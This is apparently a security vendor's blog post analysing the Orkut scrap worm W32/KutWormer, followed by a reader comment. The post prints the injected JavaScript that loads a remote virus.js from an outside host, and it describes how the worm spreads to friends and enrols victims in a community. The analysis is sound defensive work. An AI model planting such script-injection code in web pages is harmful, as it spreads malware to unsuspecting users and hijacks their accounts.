#SecChat $1 million guarantee 12 Scams of Christmas access to live fraud resolution agents Acquisition Alex Thurber Android antivirus Apple botnet Channel Partners cloud security Compliance Consumer counter identity theft credit card fraud and protection credit fraud alerts credit monitoring credit monitoring and resolution critical infrastructure Cyber Security Mom cyberbullying Cybercrime cybermom data breach data center data center security Data Protection Dave DeWalt DLP Email & Web Security embedded encryption Endpoint Protection enterprise facebook fake anti-virus software Family Safety Friday Security Highlights global threat intelligence google government Hacktivism how to talk to kids how to talk to teens identity fraud identity fraud scams identity protection identity protection $1 million guarantee identity protection fraud identity protection surveillance identity surveillance identity theft identity theft expert identity theft fraud identity theft protection identity theft protection product Identity thieves and cybercriminals intel iphone kids online behavior lost wallet protection malware McAfee McAfee Channel McAfee Family Protection McAfee Identity Protection McAfee Initiative to Fight Cybercrime McAfee Labs McAfee security products Mid-Market Mobile mobile malware mobile security monitor credit and personal information Network Security online personal data protection online safety Operation Aurora PCI personal identity theft fraud personal information loss personal information protection phishing privacy proactive identity protection proactive identity surveillance Public Sector restore credit and personal identity Risk and Compliance scam scams scareware security smartphones social media social networking social networks spam Stuxnet twitter vulnerability Web 2.0 work with victim restore identity
|
|
I analyzed some suspicious scrap “2008 vem ai… que ele comece mto bem para vc” from a bunch of friends on Orkut. For a while it was all over Orkut!! Translated to English, it reads “2008 is coming…I wish that it begins quite well for you”.
The HTML source of the scrapbook gives:
script type=”text/javascript” var flashWriter = new _SWFObject(‘http://www.orkut.com/LoL.aspx’, ’408030725′, ’1′, ’1′, ’9′, ‘#FFFFFF’,
‘autohigh’, ”, ”, ’408030725′);
flashWriter._addParam(‘wmode’, ‘transparent’);
script=document.createElement(‘script’);
script.src=’http://files.[REMOVED].com/virusdoorkut/files/virus.js’;
document.getElementsByTagName(‘head’)[0].appendChild(script);
escape(”); flashWriter._addParam(‘allowNetworking’, ‘internal’);
flashWriter._addParam(‘allowScriptAccess’, ‘never’);
flashWriter._setAttribute(‘style’, ”);
flashWriter._write(‘flashDiv408030725′);
/script
When an Orkut user receives this malicious scrap, the browser downloads and executes the embedded virus.js script. It seems to do at least 2 things (it’s obfuscated and compacted, and I am writing this without any detailed analysis of the script so far) – scrap your friends with the same virulent message, and add your account to an Orkut community “Infectados pelo VÃrus do Orkut” (“Infected by Orkut Virus” in English) created by the script author:
http://www.orkut.com/Community.aspx?cmm=44001818
A more detailed review of W32/KutWormer can be found in the Avert Labs Threat Library here.
As of the time of this writing, it had about 400,000 members (victims of this spam-worm). Apart from this, the worm doesn’t seem to affect your machine in any way. As I am writing this blog, I have seen the scraps disappearing so it looks like Orkut/Google are fighting back.
This clearly illustrates the issue with allowing rich-content on social/professional networking sites, and not sanitizing it enough. The ability to add Flash/Javascript content to Orkut scraps was only recently introduced.
|
|
This is all Done by the Master Mind ===>
Rodrego Lacerda
The Thinking was –>
He sent the scrap with the script embedded
when those ppl opened there scrapbook,
they joint comm, sent same scrap to all there frnds and that scrap frm there sb got dleted
So it went on and on till Orkut fixed that bug
and that Community had 6 Lack members in a Go [I think it shud make world Record lolz
]
You may see this Video (How members r increasing second by second):
http://www.youtube.com/watch?v=lS1P9kdg3_8
Submit your own comments / message for this post